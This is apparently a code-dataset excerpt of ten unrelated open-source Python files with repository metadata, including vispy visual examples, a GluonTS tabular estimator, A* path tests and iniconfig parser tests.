max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
gfwlist/gen.py | lipeijian/shadowsocks-android | 137 | 8140 | <reponame>lipeijian/shadowsocks-android
#!/usr/bin/python
# -*- encoding: utf8 -*-
import itertools
import math
import sys
import IPy
def main():
china_list_set = IPy.IPSet()
for line in sys.stdin:
china_list_set.add(IPy.IP(line))
# 输出结果
for ip in china_list_set:
print '<item>' + str(ip) + '</item>'
if __name__ == "__main__":
main()
|
examples/basics/visuals/line_prototype.py | 3DAlgoLab/vispy | 2,617 | 8174 | # -*- coding: utf-8 -*-
# vispy: gallery 10
# Copyright (c) Vispy Development Team. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
import sys
import numpy as np
from vispy import app, gloo, visuals
from vispy.visuals.filters import Clipper, ColorFilter
from vispy.visuals.shaders import MultiProgram
from vispy.visuals.collections import PointCollection
from vispy.visuals.transforms import STTransform
from vispy.scene import SceneCanvas
from vispy.scene.visuals import create_visual_node
class LineVisual(visuals.Visual):
"""Example of a very simple GL-line visual.
This shows the minimal set of methods that need to be reimplemented to
make a new visual class.
"""
def __init__(self, pos=None, color=(1, 1, 1, 1)):
vcode = """
attribute vec2 a_pos;
void main() {
gl_Position = $transform(vec4(a_pos, 0., 1.));
gl_PointSize = 10.;
}
"""
fcode = """
void main() {
gl_FragColor = $color;
}
"""
visuals.Visual.__init__(self, vcode=vcode, fcode=fcode)
self.pos_buf = gloo.VertexBuffer()
# The Visual superclass contains a MultiProgram, which is an object
# that behaves like a normal shader program (you can assign shader
# code, upload values, set template variables, etc.) but internally
# manages multiple ModularProgram instances, one per view.
# The MultiProgram is accessed via the `shared_program` property, so
# the following modifications to the program will be applied to all
# views:
self.shared_program['a_pos'] = self.pos_buf
self.shared_program.frag['color'] = color
self._need_upload = False
# Visual keeps track of draw mode, index buffer, and GL state. These
# are shared between all views.
self._draw_mode = 'line_strip'
self.set_gl_state('translucent', depth_test=False)
if pos is not None:
self.set_data(pos)
def set_data(self, pos):
self._pos = pos
self._need_upload = True
def _prepare_transforms(self, view=None):
view.view_program.vert['transform'] = view.transforms.get_transform()
def _prepare_draw(self, view=None):
"""This method is called immediately before each draw.
The *view* argument indicates which view is about to be drawn.
"""
if self._need_upload:
# Note that pos_buf is shared between all views, so we have no need
# to use the *view* argument in this example. This will be true
# for most visuals.
self.pos_buf.set_data(self._pos)
self._need_upload = False
class PointVisual(LineVisual):
"""Another simple visual class.
Due to the simplicity of these example classes, it was only necessary to
subclass from LineVisual and set the draw mode to 'points'. A more
fully-featured PointVisual class might not follow this approach.
"""
def __init__(self, pos=None, color=(1, 1, 1, 1)):
LineVisual.__init__(self, pos, color)
self._draw_mode = 'points'
class PlotLineVisual(visuals.CompoundVisual):
"""An example compound visual that draws lines and points.
To the user, the compound visual behaves exactly like a normal visual--it
has a transform system, draw() and bounds() methods, etc. Internally, the
compound visual automatically manages proxying these transforms and methods
to its sub-visuals.
"""
def __init__(self, pos=None, line_color=(1, 1, 1, 1),
point_color=(1, 1, 1, 1)):
self._line = LineVisual(pos, color=line_color)
self._point = PointVisual(pos, color=point_color)
visuals.CompoundVisual.__init__(self, [self._line, self._point])
class PointCollectionVisual(visuals.Visual):
"""Thin wrapper around a point collection.
Note: This is currently broken!
"""
def __init__(self):
prog = MultiProgram(vcode='', fcode='')
self.points = PointCollection("agg", color="shared", program=prog)
visuals.Visual.__init__(self, program=prog)
def _prepare_draw(self, view):
if self.points._need_update:
self.points._update()
self._draw_mode = self.points._mode
self._index_buffer = self.points._indices_buffer
def append(self, *args, **kwargs):
self.points.append(*args, **kwargs)
def _prepare_transforms(self, view=None):
pass
@property
def color(self):
return self.points['color']
@color.setter
def color(self, c):
self.points['color'] = c
class PanZoomTransform(STTransform):
def __init__(self, canvas=None, aspect=None, **kwargs):
self._aspect = aspect
self.attach(canvas)
STTransform.__init__(self, **kwargs)
def attach(self, canvas):
""" Attach this tranform to a canvas """
self._canvas = canvas
canvas.events.mouse_wheel.connect(self.on_mouse_wheel)
canvas.events.mouse_move.connect(self.on_mouse_move)
def on_mouse_move(self, event):
if event.is_dragging:
dxy = event.pos - event.last_event.pos
button = event.press_event.button
if button == 1:
self.move(dxy)
elif button == 2:
center = event.press_event.pos
if self._aspect is None:
self.zoom(np.exp(dxy * (0.01, -0.01)), center)
else:
s = dxy[1] * -0.01
self.zoom(np.exp(np.array([s, s])), center)
def on_mouse_wheel(self, event):
self.zoom(np.exp(event.delta * (0.01, -0.01)), event.pos)
canvas = app.Canvas(keys='interactive', size=(900, 600), show=True,
title="Visual Canvas")
pos = np.random.normal(size=(1000, 2), loc=0, scale=50).astype('float32')
pos[0] = [0, 0]
# Make a line visual
line = LineVisual(pos=pos)
line.transforms.canvas = canvas
line.transform = STTransform(scale=(2, 1), translate=(20, 20))
panzoom = PanZoomTransform(canvas)
line.transforms.scene_transform = panzoom
panzoom.changed.connect(lambda ev: canvas.update())
# Attach color filter to all views (current and future) of the visual
line.attach(ColorFilter((1, 1, 0.5, 0.7)))
# Attach a clipper just to this view. The Clipper filter requires a
# transform that maps from the framebuffer coordinate system to the
# clipping coordinates.
tr = line.transforms.get_transform('framebuffer', 'canvas')
line.attach(Clipper((20, 20, 260, 260), transform=tr), view=line)
# Make a view of the line that will draw its shadow
shadow = line.view()
shadow.transforms.canvas = canvas
shadow.transform = STTransform(scale=(2, 1), translate=(25, 25))
shadow.transforms.scene_transform = panzoom
shadow.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow)
tr = shadow.transforms.get_transform('framebuffer', 'canvas')
shadow.attach(Clipper((20, 20, 260, 260), transform=tr), view=shadow)
# And make a second view of the line with different clipping bounds
view = line.view()
view.transforms.canvas = canvas
view.transform = STTransform(scale=(2, 0.5), translate=(450, 150))
tr = view.transforms.get_transform('framebuffer', 'canvas')
view.attach(Clipper((320, 20, 260, 260), transform=tr), view=view)
# Make a compound visual
plot = PlotLineVisual(pos, (0.5, 1, 0.5, 0.2), (0.5, 1, 1, 0.3))
plot.transforms.canvas = canvas
plot.transform = STTransform(translate=(80, 450), scale=(1.5, 1))
tr = plot.transforms.get_transform('framebuffer', 'canvas')
plot.attach(Clipper((20, 320, 260, 260), transform=tr), view=plot)
# And make a view on the compound
view2 = plot.view()
view2.transforms.canvas = canvas
view2.transform = STTransform(scale=(1.5, 1), translate=(450, 400))
tr = view2.transforms.get_transform('framebuffer', 'canvas')
view2.attach(Clipper((320, 320, 260, 260), transform=tr), view=view2)
# And a shadow for the view
shadow2 = plot.view()
shadow2.transforms.canvas = canvas
shadow2.transform = STTransform(scale=(1.5, 1), translate=(455, 405))
shadow2.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow2)
tr = shadow2.transforms.get_transform('framebuffer', 'canvas')
shadow2.attach(Clipper((320, 320, 260, 260), transform=tr), view=shadow2)
# Example of a collection visual
collection = PointCollectionVisual()
collection.transforms.canvas = canvas
collection.transform = STTransform(translate=(750, 150))
collection.append(np.random.normal(loc=0, scale=20, size=(10000, 3)),
itemsize=5000)
collection.color = (1, 0.5, 0.5, 1), (0.5, 0.5, 1, 1)
shadow3 = collection.view()
shadow3.transforms.canvas = canvas
shadow3.transform = STTransform(scale=(1, 1), translate=(752, 152))
shadow3.attach(ColorFilter((0, 0, 0, 0.6)), view=shadow3)
# tr = shadow3.transforms.get_transform('framebuffer', 'canvas')
# shadow3.attach(Clipper((320, 320, 260, 260), transform=tr), view=shadow2)
order = [shadow, line, view, plot, shadow2, view2, shadow3, collection]
@canvas.connect
def on_draw(event):
canvas.context.clear((0.3, 0.3, 0.3, 1.0))
for v in order:
v.draw()
def on_resize(event):
# Set canvas viewport and reconfigure visual transforms to match.
vp = (0, 0, canvas.physical_size[0], canvas.physical_size[1])
canvas.context.set_viewport(*vp)
for v in order:
v.transforms.configure(canvas=canvas, viewport=vp)
canvas.events.resize.connect(on_resize)
on_resize(None)
Line = create_visual_node(LineVisual)
canvas2 = SceneCanvas(keys='interactive', title='Scene Canvas', show=True)
v = canvas2.central_widget.add_view(margin=10)
v.border_color = (1, 1, 1, 1)
v.bgcolor = (0.3, 0.3, 0.3, 1)
v.camera = 'panzoom'
line2 = Line(pos, parent=v.scene)
def mouse(ev):
print(ev)
v.events.mouse_press.connect(mouse)
if __name__ == '__main__':
if sys.flags.interactive != 1:
app.run()
|
util/util.py | harshitAgr/vess2ret | 111 | 8177 | """Auxiliary methods."""
import os
import json
from errno import EEXIST
import numpy as np
import seaborn as sns
import cPickle as pickle
import matplotlib.pyplot as plt
sns.set()
DEFAULT_LOG_DIR = 'log'
ATOB_WEIGHTS_FILE = 'atob_weights.h5'
D_WEIGHTS_FILE = 'd_weights.h5'
class MyDict(dict):
"""
Dictionary that allows to access elements with dot notation.
ex:
>> d = MyDict({'key': 'val'})
>> d.key
'val'
>> d.key2 = 'val2'
>> d
{'key2': 'val2', 'key': 'val'}
"""
__getattr__ = dict.get
__setattr__ = dict.__setitem__
def convert_to_rgb(img, is_binary=False):
"""Given an image, make sure it has 3 channels and that it is between 0 and 1."""
if len(img.shape) != 3:
raise Exception("""Image must have 3 dimensions (channels x height x width). """
"""Given {0}""".format(len(img.shape)))
img_ch, _, _ = img.shape
if img_ch != 3 and img_ch != 1:
raise Exception("""Unsupported number of channels. """
"""Must be 1 or 3, given {0}.""".format(img_ch))
imgp = img
if img_ch == 1:
imgp = np.repeat(img, 3, axis=0)
if not is_binary:
imgp = imgp * 127.5 + 127.5
imgp /= 255.
return np.clip(imgp.transpose((1, 2, 0)), 0, 1)
def compose_imgs(a, b, is_a_binary=True, is_b_binary=False):
"""Place a and b side by side to be plotted."""
ap = convert_to_rgb(a, is_binary=is_a_binary)
bp = convert_to_rgb(b, is_binary=is_b_binary)
if ap.shape != bp.shape:
raise Exception("""A and B must have the same size. """
"""{0} != {1}""".format(ap.shape, bp.shape))
# ap.shape and bp.shape must have the same size here
h, w, ch = ap.shape
composed = np.zeros((h, 2*w, ch))
composed[:, :w, :] = ap
composed[:, w:, :] = bp
return composed
def get_log_dir(log_dir, expt_name):
"""Compose the log_dir with the experiment name."""
if log_dir is None:
raise Exception('log_dir can not be None.')
if expt_name is not None:
return os.path.join(log_dir, expt_name)
return log_dir
def mkdir(mypath):
"""Create a directory if it does not exist."""
try:
os.makedirs(mypath)
except OSError as exc:
if exc.errno == EEXIST and os.path.isdir(mypath):
pass
else:
raise
def create_expt_dir(params):
"""Create the experiment directory and return it."""
expt_dir = get_log_dir(params.log_dir, params.expt_name)
# Create directories if they do not exist
mkdir(params.log_dir)
mkdir(expt_dir)
# Save the parameters
json.dump(params, open(os.path.join(expt_dir, 'params.json'), 'wb'),
indent=4, sort_keys=True)
return expt_dir
def plot_loss(loss, label, filename, log_dir):
"""Plot a loss function and save it in a file."""
plt.figure(figsize=(5, 4))
plt.plot(loss, label=label)
plt.legend()
plt.savefig(os.path.join(log_dir, filename))
plt.clf()
def log(losses, atob, it_val, N=4, log_dir=DEFAULT_LOG_DIR, expt_name=None,
is_a_binary=True, is_b_binary=False):
"""Log losses and atob results."""
log_dir = get_log_dir(log_dir, expt_name)
# Save the losses for further inspection
pickle.dump(losses, open(os.path.join(log_dir, 'losses.pkl'), 'wb'))
###########################################################################
# PLOT THE LOSSES #
###########################################################################
plot_loss(losses['d'], 'discriminator', 'd_loss.png', log_dir)
plot_loss(losses['d_val'], 'discriminator validation', 'd_val_loss.png', log_dir)
plot_loss(losses['p2p'], 'Pix2Pix', 'p2p_loss.png', log_dir)
plot_loss(losses['p2p_val'], 'Pix2Pix validation', 'p2p_val_loss.png', log_dir)
###########################################################################
# PLOT THE A->B RESULTS #
###########################################################################
plt.figure(figsize=(10, 6))
for i in range(N*N):
a, _ = next(it_val)
bp = atob.predict(a)
img = compose_imgs(a[0], bp[0], is_a_binary=is_a_binary, is_b_binary=is_b_binary)
plt.subplot(N, N, i+1)
plt.imshow(img)
plt.axis('off')
plt.savefig(os.path.join(log_dir, 'atob.png'))
plt.clf()
# Make sure all the figures are closed.
plt.close('all')
def save_weights(models, log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Save the weights of the models into a file."""
log_dir = get_log_dir(log_dir, expt_name)
models.atob.save_weights(os.path.join(log_dir, ATOB_WEIGHTS_FILE), overwrite=True)
models.d.save_weights(os.path.join(log_dir, D_WEIGHTS_FILE), overwrite=True)
def load_weights(atob, d, log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Load the weights into the corresponding models."""
log_dir = get_log_dir(log_dir, expt_name)
atob.load_weights(os.path.join(log_dir, ATOB_WEIGHTS_FILE))
d.load_weights(os.path.join(log_dir, D_WEIGHTS_FILE))
def load_weights_of(m, weights_file, log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Load the weights of the model m."""
log_dir = get_log_dir(log_dir, expt_name)
m.load_weights(os.path.join(log_dir, weights_file))
def load_losses(log_dir=DEFAULT_LOG_DIR, expt_name=None):
"""Load the losses of the given experiment."""
log_dir = get_log_dir(log_dir, expt_name)
losses = pickle.load(open(os.path.join(log_dir, 'losses.pkl'), 'rb'))
return losses
def load_params(params):
"""
Load the parameters of an experiment and return them.
The params passed as argument will be merged with the new params dict.
If there is a conflict with a key, the params passed as argument prevails.
"""
expt_dir = get_log_dir(params.log_dir, params.expt_name)
expt_params = json.load(open(os.path.join(expt_dir, 'params.json'), 'rb'))
# Update the loaded parameters with the current parameters. This will
# override conflicting keys as expected.
expt_params.update(params)
return expt_params
|
demo/gpnas/CVPR2021_NAS_competition_gpnas_demo.py | ZichaoGuo/PaddleSlim | 926 | 8203 | <filename>demo/gpnas/CVPR2021_NAS_competition_gpnas_demo.py
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import copy
import numpy as np
from paddleslim.nas import GPNAS
# 使用GP-NAS参加[CVPR 2021 NAS国际比赛](https://www.cvpr21-nas.com/competition) Track2 demo
# [CVPR 2021 NAS国际比赛Track2 studio地址](https://aistudio.baidu.com/aistudio/competition/detail/71?lang=en)
# [AI studio GP-NAS demo](https://aistudio.baidu.com/aistudio/projectdetail/1824958)
# demo 基于paddleslim自研NAS算法GP-NAS:Gaussian Process based Neural Architecture Search
# 基于本demo的改进版可以获得双倍奖金
def preprare_trainning_data(file_name, t_flag):
## t_flag ==1 using all trainning data
## t_flag ==2 using half trainning data
with open(file_name, 'r') as f:
arch_dict = json.load(f)
Y_all = []
X_all = []
for sub_dict in arch_dict.items():
Y_all.append(sub_dict[1]['acc'] * 100)
X_all.append(np.array(sub_dict[1]['arch']).T.reshape(4, 16)[2])
X_all, Y_all = np.array(X_all), np.array(Y_all)
X_train, Y_train, X_test, Y_test = X_all[0::t_flag], Y_all[
0::t_flag], X_all[1::t_flag], Y_all[1::t_flag]
return X_train, Y_train, X_test, Y_test
if __name__ == '__main__':
stage1_file = './datasets/Track2_stage1_trainning.json'
stage2_file = './datasets/Track2_stage2_few_show_trainning.json'
X_train_stage1, Y_train_stage1, X_test_stage1, Y_test_stage1 = preprare_trainning_data(
stage1_file, 1)
X_train_stage2, Y_train_stage2, X_test_stage2, Y_test_stage2 = preprare_trainning_data(
stage2_file, 2)
gpnas = GPNAS()
w = gpnas.get_initial_mean(X_test_stage1, Y_test_stage1)
init_cov = gpnas.get_initial_cov(X_train_stage1)
error_list = np.array(
Y_test_stage2.reshape(len(Y_test_stage2), 1) - gpnas.get_predict(
X_test_stage2))
print('RMSE trainning on stage1 testing on stage2:',
np.sqrt(np.dot(error_list.T, error_list) / len(error_list)))
gpnas.get_posterior_mean(X_train_stage2[0::3], Y_train_stage2[0::3])
gpnas.get_posterior_mean(X_train_stage2[1::3], Y_train_stage2[1::3])
gpnas.get_posterior_cov(X_train_stage2[1::3], Y_train_stage2[1::3])
error_list = np.array(
Y_test_stage2.reshape(len(Y_test_stage2), 1) - gpnas.get_predict_jiont(
X_test_stage2, X_train_stage2[::1], Y_train_stage2[::1]))
print('RMSE using stage1 as prior:',
np.sqrt(np.dot(error_list.T, error_list) / len(error_list)))
|
windows_packages_gpu/torch/nn/intrinsic/qat/modules/linear_relu.py | codeproject/DeepStack | 353 | 8207 | from __future__ import absolute_import, division, print_function, unicode_literals
import torch.nn.qat as nnqat
import torch.nn.intrinsic
import torch.nn.functional as F
class LinearReLU(nnqat.Linear):
r"""
A LinearReLU module fused from Linear and ReLU modules, attached with
FakeQuantize modules for output activation and weight, used in
quantization aware training.
We adopt the same interface as :class:`torch.nn.Linear`.
Similar to `torch.nn.intrinsic.LinearReLU`, with FakeQuantize modules initialized to
default.
Attributes:
activation_post_process: fake quant module for output activation
weight: fake quant module for weight
Examples::
>>> m = nn.qat.LinearReLU(20, 30)
>>> input = torch.randn(128, 20)
>>> output = m(input)
>>> print(output.size())
torch.Size([128, 30])
"""
_FLOAT_MODULE = torch.nn.intrinsic.LinearReLU
def __init__(self, in_features, out_features, bias=True,
qconfig=None):
super(LinearReLU, self).__init__(in_features, out_features, bias, qconfig)
def forward(self, input):
return self.activation_post_process(F.relu(
F.linear(input, self.weight_fake_quant(self.weight), self.bias)))
@classmethod
def from_float(cls, mod, qconfig=None):
return super(LinearReLU, cls).from_float(mod, qconfig)
|
tests/basic/test_basic.py | kopp/python-astar | 133 | 8219 | import unittest
import astar
class BasicTests(unittest.TestCase):
def test_bestpath(self):
"""ensure that we take the shortest path, and not the path with less elements.
the path with less elements is A -> B with a distance of 100
the shortest path is A -> C -> D -> B with a distance of 60
"""
nodes = {'A': [('B', 100), ('C', 20)],
'C': [('D', 20)], 'D': [('B', 20)]}
def neighbors(n):
for n1, d in nodes[n]:
yield n1
def distance(n1, n2):
for n, d in nodes[n1]:
if n == n2:
return d
def cost(n, goal):
return 1
path = list(astar.find_path('A', 'B', neighbors_fnct=neighbors,
heuristic_cost_estimate_fnct=cost, distance_between_fnct=distance))
self.assertEqual(4, len(path))
for i, n in enumerate('ACDB'):
self.assertEqual(n, path[i])
if __name__ == '__main__':
unittest.main()
|
src/gluonts/nursery/autogluon_tabular/estimator.py | Xiaoxiong-Liu/gluon-ts | 2,648 | 8239 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import logging
from typing import Callable, Optional, List, Tuple
import pandas as pd
from autogluon.tabular import TabularPredictor as AutogluonTabularPredictor
from gluonts.core.component import validated
from gluonts.dataset.common import Dataset
from gluonts.dataset.util import to_pandas
from gluonts.model.estimator import Estimator
from gluonts.time_feature import (
TimeFeature,
get_lags_for_frequency,
time_features_from_frequency_str,
)
from .predictor import (
TabularPredictor,
mean_abs_scaling,
get_features_dataframe,
)
logger = logging.getLogger(__name__)
class TabularEstimator(Estimator):
"""An estimator that trains an Autogluon Tabular model for time series
forecasting.
Additional keyword arguments to the constructor, other than the ones documented
below, will be passed on to Autogluon Tabular's ``fit`` method used for training
the model.
Parameters
----------
freq
Frequency of the data to handle
prediction_length
Prediction length
lag_indices
List of indices of the lagged observations to use as features. If
None, this will be set automatically based on the frequency.
time_features
List of time features to be used. If None, this will be set automatically
based on the frequency.
scaling
Function to be used to scale time series. This should take a pd.Series object
as input, and return a scaled pd.Series and the scale (float). By default,
this divides a series by the mean of its absolute value.
batch_size
Batch size of the resulting predictor; this is just used at prediction
time, and does not affect training in any way.
disable_auto_regression
Whether to forecefully disable auto-regression in the model. If ``True``,
this will remove any lag index which is smaller than ``prediction_length``.
This will make predictions more efficient, but may impact their accuracy.
quantiles_to_predict
Whether to forecast in quantile way. If assigned with quantile values,
this will train model using quantile prediction model. If None, then the model
will be trained in a regular way.
"""
@validated()
def __init__(
self,
freq: str,
prediction_length: int,
lag_indices: Optional[List[int]] = None,
time_features: Optional[List[TimeFeature]] = None,
scaling: Callable[
[pd.Series], Tuple[pd.Series, float]
] = mean_abs_scaling,
batch_size: Optional[int] = 32,
disable_auto_regression: bool = False,
last_k_for_val: Optional[int] = None,
quantiles_to_predict: Optional[List[float]] = None,
eval_metric: str = "mean_absolute_error",
**kwargs,
) -> None:
super().__init__()
self.freq = freq
self.prediction_length = prediction_length
self.lag_indices = (
lag_indices
if lag_indices is not None
else get_lags_for_frequency(self.freq)
)
self.time_features = (
time_features
if time_features is not None
else time_features_from_frequency_str(self.freq)
)
self.batch_size = batch_size
self.disable_auto_regression = disable_auto_regression
self.scaling = scaling
self.last_k_for_val = last_k_for_val
self.eval_metric = eval_metric
self.quantiles_to_predict = quantiles_to_predict
if self.disable_auto_regression:
self.lag_indices = [
lag_idx
for lag_idx in self.lag_indices
if lag_idx >= self.prediction_length
]
default_kwargs = {
"time_limit": 60,
# "excluded_model_types": ["KNN", "XT", "RF"],
"presets": [
"high_quality_fast_inference_only_refit",
"optimize_for_deployment",
],
"auto_stack": True,
}
self.kwargs = {**default_kwargs, **kwargs}
def train(
self,
training_data: Dataset,
validation_data: Optional[Dataset] = None,
) -> TabularPredictor:
kwargs_override = {}
dfs = [
get_features_dataframe(
series=self.scaling(to_pandas(entry))[0],
time_features=self.time_features,
lag_indices=self.lag_indices,
)
for entry in training_data
]
if validation_data is not None or self.last_k_for_val is not None:
kwargs_override["auto_stack"] = False
logger.warning(
"Auto Stacking is turned off "
"as validation dataset is provided before input into Tabular Predictor."
)
if validation_data is not None:
logger.log(20, "Validation dataset is directly provided.")
validation_dfs = [
get_features_dataframe(
series=self.scaling(to_pandas(entry))[0],
time_features=self.time_features,
lag_indices=self.lag_indices,
)
for entry in validation_data
]
train_df = pd.concat(dfs)
val_df = pd.concat(validation_dfs)
elif self.last_k_for_val is not None:
logger.log(
20,
f"last_k_for_val is provided, choosing last {self.last_k_for_val} of each time series as validation set.",
)
train_dfs = [
tmp_df.iloc[: -self.last_k_for_val, :] for tmp_df in dfs
]
validation_dfs = [
tmp_df.iloc[-self.last_k_for_val :, :] for tmp_df in dfs
]
train_df = pd.concat(train_dfs)
val_df = pd.concat(validation_dfs)
else:
logger.log(
20,
"No validation dataset is provided, will let TabularPredictor do the splitting automatically,"
"Note that this might break the time order of time series data.",
)
train_df = pd.concat(dfs)
val_df = None
if self.quantiles_to_predict is not None:
ag_model = AutogluonTabularPredictor(
label="target",
problem_type="quantile",
quantile_levels=self.quantiles_to_predict,
).fit(
train_df,
tuning_data=val_df,
**{**self.kwargs, **kwargs_override},
)
else:
ag_model = AutogluonTabularPredictor(
label="target",
problem_type="regression",
eval_metric=self.eval_metric,
).fit(
train_df,
tuning_data=val_df,
**{**self.kwargs, **kwargs_override},
)
return TabularPredictor(
ag_model=ag_model,
freq=self.freq,
prediction_length=self.prediction_length,
time_features=self.time_features,
lag_indices=self.lag_indices,
scaling=self.scaling,
batch_size=self.batch_size,
quantiles_to_predict=self.quantiles_to_predict,
)
|
pre_embed.py | shelleyyyyu/few_shot | 253 | 8251 | import numpy as np
from collections import defaultdict, Counter
import random
import json
from tqdm import tqdm
def transX(dataset):
rel2id = json.load(open(dataset + '/relation2ids'))
ent2id = json.load(open(dataset + '/ent2ids'))
with open('../Fast-TransX/' + dataset + '_base/entity2id.txt', 'w') as g1:
num_ents = len(ent2id.keys())
g1.write(str(num_ents) + '\n')
for k, v in ent2id.items():
g1.write(k + '\t' + str(v) + '\n')
with open('../Fast-TransX/' + dataset + '_base/relation2id.txt', 'w') as g1:
num_rels = len(rel2id.keys())
g1.write(str(num_rels) + '\n')
for k, v in rel2id.items():
g1.write(k + '\t' + str(v) + '\n')
file_name = dataset + '/path_graph'
train_triples = []
with open(file_name) as f:
lines = f.readlines()
for line in tqdm(lines):
e1 = line.split('\t')[0]
e2 = line.rstrip().split('\t')[2]
rel = line.split('\t')[1]
train_triples.append([e1,rel,e2])
train_triples.append([e2,rel+'_inv',e1])
with open('../Fast-TransX/' + dataset + '_base/train2id.txt', 'w') as g3:
num_triples = len(train_triples)
g3.write(str(num_triples) + '\n')
for triple in train_triples:
e1, rel, e2 = triple
g3.write(str(ent2id[e1]) + '\t' + str(ent2id[e2]) + '\t' + str(rel2id[rel]) + '\n')
if __name__ == '__main__':
transX('Wiki') |
amadeus/travel/trip_parser_jobs/_status.py | akshitsingla/amadeus-python | 125 | 8279 | <reponame>akshitsingla/amadeus-python<gh_stars>100-1000
from amadeus.client.decorator import Decorator
class TripParserStatus(Decorator, object):
def __init__(self, client, job_id):
Decorator.__init__(self, client)
self.job_id = job_id
def get(self, **params):
'''
Returns the parsing status and the link to the result
in case of successful parsing.
.. code-block:: python
amadeus.travel.trip_parser_jobs.status('XXX').get
:rtype: amadeus.Response
:raises amadeus.ResponseError: if the request could not be completed
'''
return self.client.get(
'/v2/travel/trip-parser-jobs/{0}'.format(self.job_id),
**params)
|
tools/third_party/iniconfig/testing/test_iniconfig.py | meyerweb/wpt | 2,479 | 8280 | <gh_stars>1000+
import py
import pytest
from iniconfig import IniConfig, ParseError, __all__ as ALL
from iniconfig import iscommentline
from textwrap import dedent
check_tokens = {
'section': (
'[section]',
[(0, 'section', None, None)]
),
'value': (
'value = 1',
[(0, None, 'value', '1')]
),
'value in section': (
'[section]\nvalue=1',
[(0, 'section', None, None), (1, 'section', 'value', '1')]
),
'value with continuation': (
'names =\n Alice\n Bob',
[(0, None, 'names', 'Alice\nBob')]
),
'value with aligned continuation': (
'names = Alice\n'
' Bob',
[(0, None, 'names', 'Alice\nBob')]
),
'blank line': (
'[section]\n\nvalue=1',
[(0, 'section', None, None), (2, 'section', 'value', '1')]
),
'comment': (
'# comment',
[]
),
'comment on value': (
'value = 1',
[(0, None, 'value', '1')]
),
'comment on section': (
'[section] #comment',
[(0, 'section', None, None)]
),
'comment2': (
'; comment',
[]
),
'comment2 on section': (
'[section] ;comment',
[(0, 'section', None, None)]
),
'pseudo section syntax in value': (
'name = value []',
[(0, None, 'name', 'value []')]
),
'assignment in value': (
'value = x = 3',
[(0, None, 'value', 'x = 3')]
),
'use of colon for name-values': (
'name: y',
[(0, None, 'name', 'y')]
),
'use of colon without space': (
'value:y=5',
[(0, None, 'value', 'y=5')]
),
'equality gets precedence': (
'value=xyz:5',
[(0, None, 'value', 'xyz:5')]
),
}
@pytest.fixture(params=sorted(check_tokens))
def input_expected(request):
return check_tokens[request.param]
@pytest.fixture
def input(input_expected):
return input_expected[0]
@pytest.fixture
def expected(input_expected):
return input_expected[1]
def parse(input):
# only for testing purposes - _parse() does not use state except path
ini = object.__new__(IniConfig)
ini.path = "sample"
return ini._parse(input.splitlines(True))
def parse_a_error(input):
return py.test.raises(ParseError, parse, input)
def test_tokenize(input, expected):
parsed = parse(input)
assert parsed == expected
def test_parse_empty():
parsed = parse("")
assert not parsed
ini = IniConfig("sample", "")
assert not ini.sections
def test_ParseError():
e = ParseError("filename", 0, "hello")
assert str(e) == "filename:1: hello"
def test_continuation_needs_perceeding_token():
excinfo = parse_a_error(' Foo')
assert excinfo.value.lineno == 0
def test_continuation_cant_be_after_section():
excinfo = parse_a_error('[section]\n Foo')
assert excinfo.value.lineno == 1
def test_section_cant_be_empty():
excinfo = parse_a_error('[]')
assert excinfo.value.lineno == 0
@py.test.mark.parametrize('line', [
'!!',
])
def test_error_on_weird_lines(line):
parse_a_error(line)
def test_iniconfig_from_file(tmpdir):
path = tmpdir/'test.txt'
path.write('[metadata]\nname=1')
config = IniConfig(path=path)
assert list(config.sections) == ['metadata']
config = IniConfig(path, "[diff]")
assert list(config.sections) == ['diff']
with pytest.raises(TypeError):
IniConfig(data=path.read())
def test_iniconfig_section_first(tmpdir):
with pytest.raises(ParseError) as excinfo:
IniConfig("x", data='name=1')
assert excinfo.value.msg == "no section header defined"
def test_iniconig_section_duplicate_fails():
with pytest.raises(ParseError) as excinfo:
IniConfig("x", data='[section]\n[section]')
assert 'duplicate section' in str(excinfo.value)
def test_iniconfig_duplicate_key_fails():
with pytest.raises(ParseError) as excinfo:
IniConfig("x", data='[section]\nname = Alice\nname = bob')
assert 'duplicate name' in str(excinfo.value)
def test_iniconfig_lineof():
config = IniConfig("x.ini", data=(
'[section]\n'
'value = 1\n'
'[section2]\n'
'# comment\n'
'value =2'
))
assert config.lineof('missing') is None
assert config.lineof('section') == 1
assert config.lineof('section2') == 3
assert config.lineof('section', 'value') == 2
assert config.lineof('section2', 'value') == 5
assert config['section'].lineof('value') == 2
assert config['section2'].lineof('value') == 5
def test_iniconfig_get_convert():
config = IniConfig("x", data='[section]\nint = 1\nfloat = 1.1')
assert config.get('section', 'int') == '1'
assert config.get('section', 'int', convert=int) == 1
def test_iniconfig_get_missing():
config = IniConfig("x", data='[section]\nint = 1\nfloat = 1.1')
assert config.get('section', 'missing', default=1) == 1
assert config.get('section', 'missing') is None
def test_section_get():
config = IniConfig("x", data='[section]\nvalue=1')
section = config['section']
assert section.get('value', convert=int) == 1
assert section.get('value', 1) == "1"
assert section.get('missing', 2) == 2
def test_missing_section():
config = IniConfig("x", data='[section]\nvalue=1')
with pytest.raises(KeyError):
config["other"]
def test_section_getitem():
config = IniConfig("x", data='[section]\nvalue=1')
assert config['section']['value'] == '1'
